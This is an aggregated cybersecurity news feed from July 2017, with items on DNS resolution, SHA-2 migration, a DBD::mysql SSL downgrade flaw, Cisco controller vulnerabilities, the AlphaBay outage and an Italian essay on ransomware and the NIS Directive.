July 06, 2017 02:30 PM - Dark Reading - The recent hacks of Disney and Netflix show the jeopardy that intellectual property and company secrets are in, fueled by cheap hacking tools and cryptocurrencies.

How Does DNS Work?

July 06, 2017 02:23 PM - Dyn -

It is surprising how many developers have only a very limited or even no understanding of how the DNS process actually works. So it may be useful to give a quick, high-level overview of the process that is followed when a DNS resolution request is made.

At the simplest level, all the DNS system does is convert a DNS name into an IP address; however, as you’d expect there is a large degree of complexity behind the system.

Every domain that is registered creates a DNS record, usually hosted by the company that registers the domain; however, once registered, the domain name can be transferred to be hosted elsewhere. This is simply a text record that stores details about what information should be given to anyone requesting details about this domain name. This includes web-based resolution details as well as other information such as where mail servers should connect to (MX records).

In reality there are variations and optimizations of the system to improve reliability and efficiency, but the essentials of the process are as follows.

When you type an address into a web browser:

  • A check is made to see if the details of that name are known locally, e.g., if the browser has made a previous request from that same domain name or there is an entry in the local DNS registry (e.g., hosts.txt on Windows).
  • If no local record is found, a request is sent to your local DNS server. This could be running locally on your machine or on an office network, but most commonly it is provided by the ISP that supplies your internet connection.
  • The local DNS server again checks if it already has the details of the name being requested. If there is no cached record, then the DNS server needs to locate the details of the name server that hosts the domain record for the address you are trying to resolve (the authoritative domain name server).
  • To do this the DNS server breaks the name down into its different sections, starting from the righthand side of the domain name. For example, for www.google.com, this would be split into com, google, and www. The section after the final . of the domain name (in this case, com) is known as the top-level domain (TLD). A root name server is connected to find details of the server that holds the domain record for the TLD.
  • The DNS server will make a request to the TLD name servers asking for details of the name servers that contain the details of the next section of the domain name (in this example, google). The DNS server then makes a request to the name server that holds the details for google.com. This name server may then return details of another name server that holds the records for www.google.com or, more likely at this point, will return the address associated with www.google.com.
  • The address returned by the remote name server can be an IP address or it could be another domain name, known as a CNAME; for example, www.google.com may return a reference to cdn-us.aa1.google-us.com.
  • If a CNAME is returned, the DNS server then repeats the process with the CNAME until an IP address is resolved.

An example of a recursive DNS process is shown below.

NSLookup

All domain name resolution information is publicly available. Using the NSLookup tool that is available on the command line of most computers, you can directly query the DNS system and find all the details of any DNS registration. NSLookup allows you to query using your default DNS server and also by specifying a different DNS server (e.g., Google’s public DNS server 8.8.8.8) to validate that your local DNS is returning the same details as other people are seeing.

There are also a number of websites that will complete an NSLookup request for you.

Facebook fights gag prohibiting it from alerting users to search warrants

July 06, 2017 02:07 PM - Naked Security - It's thought that the case might stem from the arrests made during the protests at Trump's inauguration when the profiles of some of the more than 200 people arrested were mined for information

All you need to know about the move from SHA-1 to SHA-2

July 06, 2017 01:44 PM - CSO Online -

For the past two years, I’ve been busy helping Public Key Infrastructure (PKI) customers prepare for and move to SHA-2, the set of cryptographic hash functions that have succeeded SHA-1. Last year, moving to SHA-2 ahead of the global deadline was a nice-to-do preparatory step. This year, now that the migration deadline has passed, it’s required.

Many digital-certificate-consuming devices and applications already display warnings/errors or operationally fail if a digital certificate containing the SHA-1 (or earlier) hash is presented, and pretty soon all of them will. Why the forced change? Because the SHA-1 hash has been shown to suffer such severe cryptographic weaknesses that its days of useful protection are over.

To read this article in full or to leave a comment, please click here

Watch Out for Malware If You're Interested in North Korean Missile Program

July 06, 2017 01:28 PM - The Hacker News - If you hold an interest in the North Korean Missile Program and are one of those curious to know capabilities of the recently tested North Korean long-range missile than you could be a target of a new malware campaign. North Korea claims to have conducted the first test of an intercontinental ballistic missile (ICBM), the Hwasong-14, on 3rd July, and US officials believe the country may have

Perl devs fix an important flaw in DBD—MySQL that affects encryption between client and server

July 06, 2017 01:22 PM - Security Affairs -

Perl development team solved a flaw in DBD—MySQL in some configurations that wasn’t enforcing encryption allowing an attacker to power MiTM attacks.

The security researcher Pali Rohár reported an important flaw in DBD—MySQL, tracked as CVE-2017-10789, that affects only encryption between client and server.

According to the expert, the issue in some configurations wasn’t enforcing encryption allowing an attacker to power MiTM attacks.

“The DBD::mysql module through 4.043 for Perl uses the mysql_ssl=1 setting to mean that SSL is optional (even though this setting’s documentation has a “your communication with the server will be encrypted” statement), which allows man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, a related issue to CVE-2015-3152.” reads the description provided by the Mitre.

Rohár discovered that the Perl DBD::mysql driver does not enforce SSL/TLS encryption when option
mysql_ssl=1 is enabled.

“Enabling encryption depends on an announcement from MySQL server what it supports which can man-in-the-middle attack spoof. DBD::mysql does not enforce SSL/TSL encryption even when certificate is specified via connection parameter mysql_ssl_ca_file.” states the advisory published by the expert. “Therefore usage of SSL/TLS encryption in DBD::mysql is insecure.”

The Perl 5 database interface maintainers have issued an important security patch for DBD—MySQL, a note on the GitHub account confirms that the issue leaves systems vulnerable to BACKRONYM and Riddle attacks.

“The important change is that DBD::mysql reject connection to MySQL server (also SSL enabled) if mysql_ssl=1 is set and libmysqlclient.so library cannot enforce SSL encryption (because is vulnerable to BACKRONYM or Riddle).” reads the note on GitHub.

 The Riddle has been uncovered in the popular DBMS Oracle MySQL in 2015, the issue can be potentially exploited by attacker powering a man-in-the-middle attack to steal usernames and passwords.

“The Riddle is a critical security vulnerability found in Oracle’s MySQL 5.5 and 5.6 client database libraries. The vulnerability allows an attacker to use riddle in the middle for breaking SSL configured connection between MySQL client and server.” states the description of the flaw.“This vulnerability is a very critical security hole because it affects MySQL — a very popular SQL database — and SSL connection which is by its definition secure.”

The flaw, tracked as CVE-2017-3305, potentially exposes login credentials to eavesdropping, an attacker can capture them when a MySQL clients 5.5 and 5.6 send them to servers.
A security update released for the versions 5.5.49 and 5.6.30 failed to completely fix the bug. The experts noticed that the Versions 5.7 and later, as well as MariaDB systems, are not affected by this issue.

According to security researcher Pali Rohár, the Riddle vulnerability results from the failed attempt to patch the BACKRONYM vulnerability affecting the MySQL database. The Backronym vulnerability exposes passwords to attackers who are in a position to run a man-in-the-middle attack, even if the traffic is encrypted.

The developers fixed the issue forcing the MySQL server to reject a connection if the client can’t enforce the SSL encryption.

Pierluigi Paganini 

(Security Affairs – DBD—MySQL, MiTM)

&https

The post Perl devs fix an important flaw in DBD—MySQL that affects encryption between client and server appeared first on Security Affairs.

ProtonMail v3.9 Release Notes

July 06, 2017 01:14 PM - ProtonMail -

ProtonMail 3.9 adds ProtonVPN integration for protecting your traffic while browsing, faster and more powerful Search, new languages, and new Drag & Drop features to make organizing your inbox easier.

Note: Due to the way we roll out new versions, ProtonMail 3.9 has not been released to everyone yet. If you do not see it yet, you will see it soon.

Over the past 3 months, we have been focused on large scale projects, such as ProtonVPN and also the upcoming IMAP/SMTP support for ProtonMail. Version 3.9 however brings several incremental changes and sets the stage for the additional releases we have planned for this summer. We expect in the next couple months to increase the speed of new ProtonMail releases.

ProtonMail does not show advertisements or abuse your privacy to make money. Paid accounts are our only source of funding. Please consider upgrading to a ProtonMail Plus account so that we can continue to operate the service and fund further development.

Drag & Drop Messages

This feature allows to organize your inbox quick and easy by making use of your custom folders/labels. Just hold down your message and drag it into the appropriate folder/label.

Improved Search

We have made further performance improvements to search and now it is approximately 1000x faster than it was a few months ago. We have also made ProtonMail’s advanced search feature more powerful. Now, advanced search will also accept complex queries such as this:

(cat -dog) | (cat mouse)

You can learn about ProtonMail’s improved search here.

Note that search still does not work for ProtonMail message bodies, as we do not have the ability to read your messages. However, we are working on a project now that will enable full-text search of your ProtonMail messages and we hope to have the first public release near the end of this summer.

Improved Language Support

The ProtonMail Translation Project has now been underway for several months, and thanks to the incredible volunteer translators from the community, ProtonMail’s web interface is now available in the following languages: French, German, Russian, Spanish, Polish and Turkish

To change the language of your ProtonMail webmail interface, go to Settings –> Account –> Language.

Auto Unsubscribe

The auto-unsubscribe feature makes it easier to unsubscribe from email lists or newsletters that you’re not keen on receiving anymore. It works by identifying the unsubscribe link in the hidden header and by making it available in the top right corner of your message. To remove your email address from mailing lists, just click “Unsubscribe”.

ProtonVPN

After more than 1 year of development, and four months of beta testing by over 10’000 members of the ProtonMail community, we’re finally making ProtonVPN available to everyone. And we really mean everyone, because consistent with our mission to make privacy and security accessible to every single person in the world, we’re also releasing ProtonVPN as a free VPN service.

ProtonVPN is now integrated into the ProtonMail dashboard, which means you can upgrade to the paid version of ProtonVPN from Settings –> Dashboard

buying protonvpn

Note: If you are a ProtonMail Plus user, you can get a 20% discount bundle when signing up for ProtonVPN. This discount is shown at checkout. Also, ProtonVPN Visionary users get ProtonVPN Plus for free.

You can also manage your ProtonVPN settings now from ProtonMail Settings, by clicking on the VPN tab:

You can learn more about ProtonVPN by going here: https://protonvpn.com

Version 3.9 Full Release Notes

New Features

  • Update Dashboard and VPN tab for the ProtonVPN release
  • Drag & Drop Elements
  • Added translations for French, German, Russian, Spanish, and Turkish
  • New sent/drafts behaviour. By default, Sent and Drafts folders will no longer show trashed or moved messages. However, the old behavior can be restored by adjusting the setting in Settings –> Account.
  • Improved Search released
  • Added auto-unsubscribe from mailing lists feature

Bug Fixes

  • Fixed problem with links not working on Safari
  • Fixed problem with displaying plaintext messages

Improvements

  • Added folder context to showing read/unread conversations in folders
  • Improved the browser message caching
  • Improved custom filters UI
  • Increased search speeds by 1000x
  • Improved the settings screens for setting display names and signatures for extra addresses to be less confusing

 

As always, your feedback is appreciated. Please report bugs using ProtonMail report bug feature, or send us a support request here: https://protonmail.com/support

The post ProtonMail v3.9 Release Notes appeared first on ProtonMail Blog.

Leading Into Prime Day, Amazon Offers 4 Months of Music Unlimited for $0.99 - Deal Alert

July 06, 2017 01:14 PM - CSO Online -

Amazon's Music Unlimited service is typically offered at $9.99/month, but Amazon has activated a special promotion as a teaser to their upcoming Prime Day on July 11. The promotion just dropped today and gets you 4 months of their Music Unlimited service for just $0.99, if you're a Prime member (or have a 30 day Prime free trial: get one here). Music Unlimited offers tens of millions of songs, with new releases from today's most popular artists. Listen ad-free with unlimited skips on all of your devices, and download for offline listening. Learn more about the very competitive streaming music service from Amazon, and take advantage of the $0.99 subscription offer, at Amazon's Music Unlimited page located here.

To read this article in full or to leave a comment, please click here

Gunshot detector automatically turns on stingray surveillance devices

July 06, 2017 01:00 PM - CSO Online -

Sadly, it seems like all you have to do is check out the news to hear about someone being shot.

To help with gun crime, more and more places are deploying gunshot detection technology such as ShotSpotter. It uses acoustic sensors (basically microphones) attached to street lights, utility poles and even rooftops—installed about 30 or more feet in the air—to detect gunshots. Other gunshot detector sensors help to triangulate where shots were fired and alert the police to the location of the gunshot. While this all happens very quickly, reportedly as fast as 45 seconds, it also relies on a human to first verify the sound was indeed gunfire.

To read this article in full or to leave a comment, please click here

FIRST announces release of Guidelines and Practices for Multi-Party Vulnerability Coordination and Disclosure

July 06, 2017 01:00 PM - FIRST -

The Forum of Incident Response and Security Teams announces the release of a set of guidelines and norms for vulnerability disclosure that affects multiple parties.

Symantec to Buy 'Browser Isolation' Firm Fireglass

July 06, 2017 12:35 PM - Dark Reading - Fireglass's emerging Web security technology will become modular component in Symantec's Integrated Cyber Defense Platform.

Everything you need to know about the latest variant of Petya

July 06, 2017 12:00 PM - WeLiveSecurity -

The latest global cyberattack, detected by ESET as Win32 / Diskcoder.C, considered a variant of Petya, once again highlights the reality outdated systems and insufficient security solutions are still widespread.

The post Everything you need to know about the latest variant of Petya appeared first on WeLiveSecurity

How to Retrieve Deleted Photos from your Phone

July 06, 2017 11:30 AM - Cyberogism -

So, you just accidentally deleted all those super important vacation pictures you wanted to post on social media. They’re displaced from your smartphone memory...

The post How to Retrieve Deleted Photos from your Phone appeared first on Cyberogism.

Now It's Easier than Ever to Steal Someone's Keys

July 06, 2017 11:27 AM - Schneier on Security -

The website key.me will make a duplicate key from a digital photo.

If a friend or coworker leaves their keys unattended for a few seconds, you know what to do.

Hackers Linked to NotPetya Ransomware Decrypted a File For Us

July 06, 2017 11:27 AM - Office of Inadequate Security - Joseph Cox and Lorenzo Franceschi-Bicchierai report: Hackers linked to the crippling NotPetya ransomware attack, which encrypts files on infected machines, have proved to Motherboard they have the ability to decrypt some locked files. Security researchers have spent much of the last week debating whether victims of NotPetya will ever get their files back, with many [...]

ZW: Computers with Criminal Records Stolen from Gutu Magistrate’s Court

July 06, 2017 11:24 AM - Office of Inadequate Security - Terrence Mawawa reports: Daring robbers broke into the office of Gutu Magistrate, Edwin Marecha, and stole two computers. […] According to sources at the Gutu Magistrates’ Court, the robbers targeted the two computers only- indicating a likelihood that they probably were after destroying criminal records and related evidence. Read more on ZimEye.

Why doctors using SnapChat to send scans is not the problem

July 06, 2017 11:12 AM - Naked Security - It's not so much the app the doctors are using, it's that they're using it to sidestep the official channels

Last month’s malware outbreak cost this household company £100 million

July 06, 2017 11:12 AM - TripWire - The State of Security -

Reckitt Benckiser, the household goods manufacturer of such famous products as Nurofen painkillers, Durex condoms, Dettol, and Harpic, has warned that it was hit hard by the June 27th global malware outbreak which struck power plants, airports, and government agencies in Ukraine before spreading to other multinational firms. In a sales warning for investors Reckitt […]… Read More

The post Last month’s malware outbreak cost this household company £100 million appeared first on The State of Security.

Snap Map Feature Stirs Privacy Concerns among Parents and Schools

July 06, 2017 11:08 AM - TripWire - The State of Security -

Snapchat’s new Snap Map location-sharing feature is stirring concerns among parents and schools for the privacy and safety of their children. Launched on 21 June 2017, Snap Map allows Snapchat users to view publicly shared “Snaps” (photos and videos) from around the world. They can also use it to share their exact location with their […]… Read More

The post Snap Map Feature Stirs Privacy Concerns among Parents and Schools appeared first on The State of Security.

AlphaBay Market, one of the largest Dark Web marketplaces is down. Is it an Exit-Scam?

July 06, 2017 10:38 AM - Security Affairs -

The AlphaBay Market went down Tuesday night without any explanation, many users that have purchased products on the marketplace fear the Exit-Scam.

The news is shocking, the AlphaBay Market, one of the largest Dark Web black markets is down. We have analyzed many times the popular black market where it was possible to buy any kind of illegal goods, including drugs, malicious code and fake documents.

The AlphaBay Market went down Tuesday night without any explanation, many users that have purchased products in the last day are waiting for news. At the time there is no indication that the marketplace went down due to an operation conducted by law enforcement.

AlphaBay is considered the largest marketplace on the dark web, competing against the likes of Abraxas, Dream, and Hansa. Operators at the marketplace have continued improving the site by adding new features, including Monero.

On the Internet is circulating the news that administrators of the black market have pulled a classic exit scam to steal users’ Bitcoin.

Users at Reddit and Twitter are claiming that administrators have shut down the black market to withdraw a huge amount of Bitcoins from The AphaBay market accounts.

Analyzing the total withdrawal it is possible to verify that admins have transferred 1,479.03904709 Bitcoin (roughly $3.8 Million), which led to suspicion from some users that the site’s admins may have pulled an exit scam to steal user funds.

AlphaBay Market

Of course, at the time I was writing this is only a hypothesis, The AlphaBay Market already went down in the past, last year the black market was not accessible for about four days. Also, the blockchain transactions of about $3.8 Million are not enough for AlphaBay moderators to go offline.

There is also a portion of users that seem to be not worried, one of them published the following message on Reddit believe that roughly $4 Million is not enough for AlphaBay operators to disappear:

“Now I’ll admit I don’t know for sure what’s going on, and I am a bit nervous myself because if this is the end then I’ve lost a couple hundred dollars myself But think about it Last year alphabay went down for about 4 days.” states the message. “Everyone was saying for sure that this was it, but it wasnt. It took the alphabay moderators days to update people on what was going on too, they’re known to do this Also about that blockchain transaction.. 44 bitcoins rounds off to about 4 million US. Idk about you but that doesn’t sound like nearly enough money. “

A Reddit user associated with the AlphaBay Market who goes by moniker Big_Muscles has called users to calm down, he explained that the site is down due to server maintenance and it will be “back online soon.”

“Will be back online soon. Servers under update” said Big_Muscles.

I reached Rick Holland, VP Strategy at Digital Shadows for a comment.

“Dark web exit scams are nothing new and are quite common. The Evolution market famously ended with the loss of 40,000 bitcoins. These exit scams are one of the risks when conducting business in criminal marketplaces. The increasing value of BTC (>$2,500 as of today) makes exit scams appealing. These exit scams are often the first assumption when a marketplace goes offline, however there are alternatives including intrusions from other criminals, DDoS attacks from competitors, law enforcement interdictions, and even unannounced site maintenance.” state Holland.

“Multiple vendors of compromised data, payment card details, malware and other services would have to seek other online services. The Dream and Hansa markets are likely to benefit from any potential Alphabay demise. Digital Shadows is tracking this development and will provide updated analysis as it becomes available.”

The AphaBay marketplace made the headlines early last year when unknowns hacked the website and stole over 200,000 private unencrypted messages from several users.

In March 2015, the largest dark web market at the time, ‘Evolution,’ suddenly disappeared overnight in similar circumstances, operators stole millions of dollars worth of Bitcoins from its customers.

Pierluigi Paganini

(Security Affairs – AlphaBay, Dark Web)

&https

The post AlphaBay Market, one of the largest Dark Web marketplaces is down. Is it an Exit-Scam? appeared first on Security Affairs.

Guide to the top college and university cyber security degree programs

July 06, 2017 10:00 AM - CSO Online -

The shortage of cyber security professionals is well documented, and this lack of expertise can keep organizations from bolstering their security programs. CISOs and CSOs should be heartened by the fact that more colleges and universities are offering academic programs and degrees in cyber security specialties. They are also doing their best to place young professionals into the workforce.

Dozens of institutions have launched undergraduate and graduate security programs. Many provide both technical and management skills to help students become well versed in the latest security technologies, threats, vulnerabilities and management strategies.

Here’s a look at a few of the leading programs in the United States.

To read this article in full or to leave a comment, please click here

BrandPost: Are massive cyberattacks the new normal?

July 06, 2017 09:14 AM - CSO Online -

CISCO fixed 3 critical issued in Elastic Services Controller and Ultra Services Framework

July 06, 2017 08:22 AM - Security Affairs -

CISCO fixed three critical issued in Elastic Services Controller and Ultra Services Framework, admins have to manual patch them.

The last weekly security update list published by CISCO includes three critical vulnerabilities affecting the Elastic Services Controller and Ultra Services Framework.

The flaw, tracked as CVE-2017-6713,  in the network function virtualisation management environment Elastic Services Controller is related to the use of static default credentials that would let a remote attacker access to all the instances of the controller’s UI.

“A vulnerability in the Play Framework of Cisco Elastic Services Controller (ESC) could allow an unauthenticated, remote attacker to gain full access to the affected system.” reads the security advisory published by CISCO.

“The vulnerability is due to static, default credentials for the Cisco ESC UI that are shared between installations. An attacker who can extract the static credentials from an existing installation of Cisco ESC could generate an admin session token that allows access to all instances of the ESC web UI.”

As reported in the security advisory the same credentials are shared between multiple installations, allowing an attacker to generate an admin session token to access any instances of the Elastic Services Controller web UI.

A second issue, tracked as CVE-2017-6712, is a privilege escalation bug caused by the presence of the user ‘tomcat‘ having access to shell commands that lets that user overwrite any file on the system, and elevate their privilege to root.

“A vulnerability in certain commands of Cisco Elastic Services Controller could allow an authenticated, remote attacker to elevate privileges to root and run dangerous commands on the server.” states the advisory issued by CISCO.

“The vulnerability occurs because a “tomcat” user on the system can run certain shell commands, allowing the user to overwrite any file on the filesystem and elevate privileges to root. An exploit could allow an authenticated, remote attacker to elevate privileges and run dangerous commands on the server.”

CISCO Elastic Services Controller

Other issues affect the Ultra Services Framework’s (USF) automation service.

A first bug in the Ultra Services Framework’s (USF) automation service (CVE-2017-6711) is related to an insecure configuration of the Apache ZooKeeper service, which could be exploited by a remote attacker to get access to the orchestrator network.

“A vulnerability in the Ultra Automation Service (UAS) of the Cisco Ultra Services Framework could allow an unauthenticated, remote attacker to gain unauthorized access to a targeted device.” states the advisory.

“The vulnerability is due to an insecure default configuration of the Apache ZooKeeper service used by the affected software. An attacker could exploit this vulnerability by accessing the affected device through the orchestrator network. An exploit could allow the attacker to gain access to ZooKeeper data nodes (znodes) and influence the behavior of the system’s high-availability feature.”

A second bug in the Ultra Services Framework’s (USF) automation service, tracked as CVE-2017-6714, resides in the staging server and could lead Arbitrary Command Execution.

“A vulnerability in the AutoIT service of Cisco Ultra Services Framework Staging Server could allow an unauthenticated, remote attacker to execute arbitrary shell commands as the Linux root user.” states the advisory.

“The vulnerability is due to improper shell invocations. An attacker could exploit this vulnerability by crafting CLI command inputs to execute Linux shell commands as the root user. An exploit could allow the attacker to execute arbitrary shell commands as the Linux root user.”

The last issue in the Ultra Services Framework AutoVNF is a Log File User Credential Information Disclosure Vulnerability (CVE-2017-6709) in the USF’s AutoVNF.

The use of Admin credentials is logged in clear text, an attacker can retrieve them accessing the logfile’s URL.

A vulnerability in the AutoVNF tool for the Cisco Ultra Services Framework could allow an unauthenticated, remote attacker to access administrative credentials for Cisco Elastic Services Controller (ESC) and Cisco OpenStack deployments in an affected system.

“The vulnerability exists because the affected software logs administrative credentials in clear text for Cisco ESC and Cisco OpenStack deployment purposes. An attacker could exploit this vulnerability by accessing the AutoVNF URL for the location where the log files are stored and subsequently accessing the administrative credentials that are stored in clear text in those log files. A successful exploit could allow the attacker to access the administrative credentials for Cisco ESC and Cisco OpenStack deployments in the affected system, which the attacker could use to conduct additional attacks.” states the advisory.

“The same product also has a symbolic link error that exposes the system to arbitrary file read and malicious code execution.”

Pierluigi Paganini 

(Security Affairs – CISCO, hacking)

&https

The post CISCO fixed 3 critical issued in Elastic Services Controller and Ultra Services Framework appeared first on Security Affairs.

AlphaBay Dark Web Market Goes Down; Users Fear Exit-Scam

July 06, 2017 08:17 AM - The Hacker News - AlphaBay Market, one of the largest Dark Web marketplaces for drugs, guns, and other illegal goods, suddenly disappeared overnight without any explanation from its admins, leaving its customers who have paid large sums in panic. AlphaBay, also known as "the new Silk Road," has been shut down since Tuesday night. The site also came in the news at the beginning of this year when a hacker

Risks of hacking attacks: Ransomware – Cryptolocker and tutorials for Italian SMEs in the light of the Network and Information Security (NIS) Directive.

July 06, 2017 07:10 AM - Security Affairs -

As was anticipated by Minister Pier Carlo Padoan, the Taormina G7, he would have to face, inter alia, the overwhelming problem of Web security and the protection of sensitive data.

The issue is much more urgent in the light of cyber attacks on computer systems of some key service providers in several EU Member States and in the UK, including the National Public Health Service (public body) or Against that of Renault in France (private body) that had the effect of completely blocking both the structures mentioned and not only.

These attacks, in fact, have been carried out on a large scale and involved hundreds of computer systems at the European level. Ransomware technology, a type of malware used in this case by hackers, has already been used on several occasions and is spreading very rapidly so that it may become, as early as 2017, a serious problem as DDoS attacks ( Distributed Denial of Service) (source: David Gubiani, Check Point Security Engineering Manager).

Even at a non-Community level, the UN Security Council has dealt with this issue with Resolution 2341/2017, in which United Nations Member States have been encouraged to co-ordinate each other by exchanging their knowledge about each other to attacks perpetrated via the Web.

On this point, it is interesting to note that Jurgen Stock (Head of Interpol) has complained of a structural disconnection that exists at present between the United Nations Members States.

And as Professor Pierluigi Paganini, Chief Technologist of CyberSec Enterprise, said in his speech: “From the Wannacry case to the NIS Directive, critical infrastructures are still too vulnerable:” While in Europe there is a debate about the need to calibrate infrastructures, criticisms and adopting security measures that will make them resilient to cyberattacks, and such events demonstrate how vulnerable network infrastructure is exposed to small-scale threats.

Think of the potential large-scale impact of a ransomware such as WannaCry that exploits a zero-day flaw, which is not known at the time of the attack and is therefore extremely dangerous. ”

In the debate on Resolution 2341/2017, particular interest can be attributed to the point where it has been shown that the key role in cyber attack prevention lies in cooperation between public and private sectors; It was therefore hoped that a Memorandum of Understanding would be established between the Member States regarding the information on the acquired data.

It appears that ictu oculi – as in the NIS Directive at Community level and in UN Security Council Resolution 2341/2017 – the phrase “wishes cooperation between the Member States” stresses how information exchange can prove to be crucial and limited cyber attacks, which can provide effective prevention and, consequently, limitations of related harm to IT systems.

However, the appearance that is particularly alarming is that for such attacks, hackers used a Ransomware called “WannaCry” a virus that, like Cryptocker, was created by scammers with high-level knowledge in the field of computer programming.

Scammers can infiltrate a PC in a variety of ways, for example through an attachment of an infected mail or through the browser, when a website is infected with this kind of malware. The word ransom means requiring a ransom, to be paid to remove the limitation and to get the possibility of access to the PC (source Avast), actually doing a real extortion by the use of the computer system. It is therefore evident that there is a consequent risk for those who give up on what is required by extortionists to feed a funding channel for occult criminal organizations and terrorist organizations (Europol sources).

However, 2016, as Gabriele Faggioli, Legal, Ceo Partners4innovation said, with the NIS Directive of the Parliament and the European Council of July 6, will be remembered as the year that will mark the course of the decades on the issue of computer security.

The future of this issue in Europe is essentially due to the rules of a broad package of will be remembered as the year that will mark the course of the next decades on the issue of computer security.

The future of this issue in Europe is essentially attributable to the rules of a large EU reform package, which has been in force and in part already applicable since this year as Regulation no. 679/2016, General Data Protection Regulation (RGPD). This legislation, which entered into force on 24 May and applicable from 24 May 2018, replaces Directive 95/46 / EC. There is, moreover, Directive n. 1148/2016, the Network and Information Security Directive (NIS Directive), which entered into force on 8 August, laying down measures for a common high level of network security and information systems in the Union.

The text of the Directive states that Member States shall ensure that public administrations and market operators take appropriate technical and organizational measures to manage network security risks and the information systems that control and use in their operations.

Given the state of the art attacks, these measures must ensure a level of safety appropriate to the actual level of risk involved.

In particular, measures should be taken to prevent and minimize the impact of accidents attacks affecting their network and the information systems on the basic services they provide and, therefore, to ensure the continuity of the services incurred by these networks and information systems.

The Legislator has undertaken to ensure that the contents of these provisions are effective, work in practice, and last for at least a generation. The provisions are dense with technical-informational references and address the challenges imposed by new technologies in data protection and system and network security.

As Antonello Salerno said, “The future of cybersecurity in Italy could be decided on two key aspects: the role of the PA as an example and a spur for the private and the training of excellence skills remaining in the country.here” Of course, there are adequate investments to protect critical infrastructures. To reach this goal, the implementation of the European Network and Information Security Directive will be important.

If, from a formal point of view, the NIS Directive, which was adopted in July, is yet to be adopted (the deadline for transposition is by May 2018), Italy has already substantially aligned with many of the requirements of the new Community legislation, and can now focus on details to make the strategy more effective.

The hubs are those of the Decree of the President of the Council of Ministers of 24 January 2013, which contains a first model of cybersecurity governance and indicates in the DSI or DIS  (Department of Security Information) and in the CISR (Interministerial Security Committee of the Republic) the main coordinating references. a

Under the NIS Directive, you will need to identify the essential service providers. The legislator could only point to the obligation to notify the attacks only for large national players, leaving the majority of Italian business fabric (mainly composed of SMEs) or, as it may be desirable, extend this obligation also to actors of relatively small size, such as many municipal or local companies, but which rely on large user bases and whose contribution on a national scale could be extremely significant.

The specific methods of allocating these resources will depend on the effectiveness of the Italian action on computer security. “The opportunity – emphasizes Andrea Rigoni (cybersecurity expert and partner of Intellium, strategic consultancy for NATO), governments and large infrastructures – is that with the adoption of the NIS directive we are back with the plan and it is decided to allocate more clearly and timely the funding for network security.”

Particularly interesting will be the role of the Public Administration, as has happened in the past on other occasions, starting with electronic billing, for example, can make a changeover for the private, thanks to compliance mechanisms. While on the one hand, the public has to make their own infrastructures and management systems compliant with international standards that the Government is required to identify and detail, and on the other hand, it may ask the same security standards for companies interested in working with the Public Administration, thus triggering a virtuous circle that will involve the private sector through the certification of the PA chain.

The risk for companies operating in any economic sector is high as evidenced by the outcome of a study that says Prof. Pierluigi Paganini is “surprising”, only 3 threats have been designed with the intent of striking critical industrial systems and infrastructures – Stuxnet, Havex, and BlackEnergy2. That data continues Paganini, “confirms that industrial systems today continue to be most exposed to generic threats, given alarming if we think an attack designed to hit these systems could have disastrous effects.

Stuxnet first, and the latest attacks in Ukraine with BlackEnergy malware have demonstrated the effectiveness of a malware in an offensive against an industrial system in a critical infrastructure. ”

From what has just been reported, additional business risks seem to derive from the use of computer media such as smartphones and tablets. Many companies, both public and private, provide computer support to their employees. With a 394% increase in smartphone and 1700% of the tablet in the past four years, it’s no wonder that mobile attacks are steadily increasing. According to the Check Point Security Report 2016, a five-person employee will be the author of a violation of his business data via mobile malware or malicious Wi-Fi, both highly effective attack devices on mobile devices.

As this trend is steadily growing, Check Point points out that mobile business-related violations is becoming an increasingly significant problem for a company’s security since these computer-based media are particularly vulnerable and vulnerable to an absence of a frequent update of the antivirus used.

Recent attacks involving some of the journalists’ phones show how attack techniques are “in the wild” and that we should expect more and more to see criminal bands using them. However, mobile security remains a challenge for businesses, a push-pull between productivity, privacy and protection.

In 2017, organizations should take into account the spread of cyber attacks through the “Industrial Internet of Things”, not only through smartphones and corporate tablets, but also, for example, by printers or other types of devices.

Convergence between IT and Operational Technology (OT) is making both the most vulnerable environments and therefore it will be necessary to extend physical control systems and physical security to logical space and implement threat prevention solutions in IT and OT environments. Critical infrastructures, including nuclear power plants, electricity and telecommunications networks, remain highly vulnerable to possible cyber attacks. Almost all infrastructures have been designed and built before the threat of cyber attacks and for this reason, even the simplest computer security principles in most cases have not been taken into account within the projects.

In this regard, it is interesting and also worrying as it has emerged in the quoted work of Prof. Pierluigi Paganini, which, as revealed by the research of the US – ICS CERT, states that: “… the energy sector is one of the most sought after and confirmed in the many attacks that have been observed over recent months by groups of criminals and nation-state actors. According to a recent analysis released by IBM Managed Security Services, the number of attacks against industrial systems has increased by 110% compared to last year. IBM experts observed a significant increase in brute-force attacks against SCADA systems. … The US leads  the rankings of the five major nations affected by the attacks, not surprising if we consider the largest number of ICS systems in the United States. ”

Only at the beginning of 2016 was the first intentional blackout caused by a computer attack.

Critical Infrastructure Security Officers must, therefore, be prepared for their networks and systems to be systematically attacked by different actors: other States, terrorists and organized crime.

Check Point’s Security Report 2016 revealed that the number of unknown malware volumes that attack organizations is nearly 10,000, with about 12 million new malware variants identified each month.

In the Security report, it is evident that: “These technologies are in fact part of our business and cybercriminals have consequently innovated their hacking techniques.”

“Hackers have become smarter when it comes to malware and ransomware, releasing every minute new variations.”

“The era of signature-based antivirus to detect malware is far away.”

“With these predictions, companies can develop their IT security plans to keep them one step ahead of emerging threats by preventing attacks before they can cause damage.”

To ensure convergence in the implementation of Article 14, Member States of the U.E. encourage the use of network standards and/or technical specifications and information security.

Just to counter the risks of attacks on computer systems, as has been previously stressed, 2016 is remembered not only for the NIS Directive but also for privacy legislation.

Member States’ legislation identifies competent authorities both in the protection of sensitive data and in identifying the Computer Security Incident Response Team (CSIRT), but the NIS Directive, since many incidents compromise personal data, also provides that the competent authority should operate in close cooperation with the authorities that supervise the protection of data in cases of incidents involving personal data breaches.

However, the two disciplines cannot be confused, as they are directed to regulate the activities of distinct subjects. It is foreseen that NIS will only be applied to providers of essential services and Internet service providers, while the privacy and data protection regulations also apply to individuals.

However, the rules in question may overlap in cases where a computer incedent also involves a violation of personal data. In this case, the affected parties will have to act to report the incidents under the two directives, either they will have to report both the incidents referred to in the NIS Directive and the notification of the violation of personal data provided by the RGPD.

The hope is that, in a juncture and in the process of transposition into our legal order of both Directives, the Authorities responsible for the surveillance and management of cyberattacks and on the protection of the preservation of personal data examine  the guidelines which can help businesses cope with security incidents, so as to ensure and insure compliance with both regulations.

